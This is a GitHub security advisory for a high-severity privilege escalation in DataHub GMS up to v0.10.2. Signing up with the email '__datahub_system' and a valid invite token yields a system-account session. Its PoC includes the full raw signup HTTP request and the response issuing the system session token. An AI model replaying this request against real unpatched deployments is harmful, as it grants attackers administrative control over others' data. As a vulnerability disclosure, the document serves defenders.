Skip to content

Privilege Escalation to system user through user signup

High
jjoyce0510 published GHSA-mcrw-j7x9-x556 Sep 20, 2024

Package

Datahub GMS (Datahub GMS)

Affected versions

<= v0.10.2

Patched versions

>= 0.12.1

Description

Summary

Missing input validation in the user signup form allows an attacker to register an account with the "email" __datahub_system.
An attacker with a valid invite token can create such an account and elevate their privileges to the system account.

Details

  • Tested with the Datahub quickstart docker-compose file.
  • Tested on version v0.10.2
  • Tested with the environment variable METADATA_SERVICE_AUTH_ENABLED=true set in the frontend and GMS container.

image

image

PoC

The raw HTTP requests can be seen in the last "References" section

  1. The attacker requires a valid invite token. Following screenshot illustrates how an invite token with "No Role" is created

image

  1. The attacker can sign up a user with the email __datahub_system. This account creation is successful and attacker gets a valid session cookie/token with the __datahub_system actor (see following screenshot)

image

  1. The attacker can use this Cookie to access administrative APIs. For example, create an access token for the __datahub_system account

image

Impact

This is a privilege escalation vulnerability which allows an attacker with a valid invite token to elevate their privileges from No Role to __datahub_system

References

Signup HTTP request

POST /signUp HTTP/1.1
Host: localhost:9002
Content-Length: 149
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "macOS"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Testuser1
Content-Type: application/json
Accept: */*
Origin: http://localhost:9002
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9002/signup?invite_token=onyyqvpbgchmyosptbwlimylughnnrbc
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: bid=f5cf3cbe-752b-44f1-b61a-33d32e01b067
Connection: close

{"fullName":"test3","email":"__datahub_system","password":"attackerPassword!","title":"Data Scientist","inviteToken":"onyyqvpbgchmyosptbwlimylughnnrbc"}

Signup HTTP response

HTTP/1.1 200 OK
Set-Cookie: PLAY_SESSION=41fdaca382e66e81909d903c83d24cc6f633299c-actor=urn%3Ali%3Acorpuser%3A__datahub_system&token=eyJhbGciOiJIUzI1NiJ9.eyJhY3RvclR5cGUiOiJVU0VSIiwiYWN0b3JJZCI6Il9fZGF0YWh1Yl9zeXN0ZW0iLCJ0eXBlIjoiU0VTU0lPTiIsInZlcnNpb24iOiIxIiwianRpIjoiYTc2OTA4MjQtMzVmZC00OWQ5LWIwZTMtN2EyMmQ0NjFkZGQ5Iiwic3ViIjoiX19kYXRhaHViX3N5c3RlbSIsImV4cCI6MTY4MjY3NDg0OCwiaXNzIjoiZGF0YWh1Yi1tZXRhZGF0YS1zZXJ2aWNlIn0.E7_x2Wta9Wlp3NT98D3WZwtogGr5dIpbRahjaJWYZEQ; SameSite=Lax; Path=/; HTTPOnly
Set-Cookie: actor=urn:li:corpuser:__datahub_system; Max-Age=2592000; Expires=Sat, 27 May 2023 09:40:48 GMT; SameSite=Lax; Path=/
Date: Thu, 27 Apr 2023 09:40:48 GMT
Connection: close
Content-Length: 0

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

No known CVE

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Credits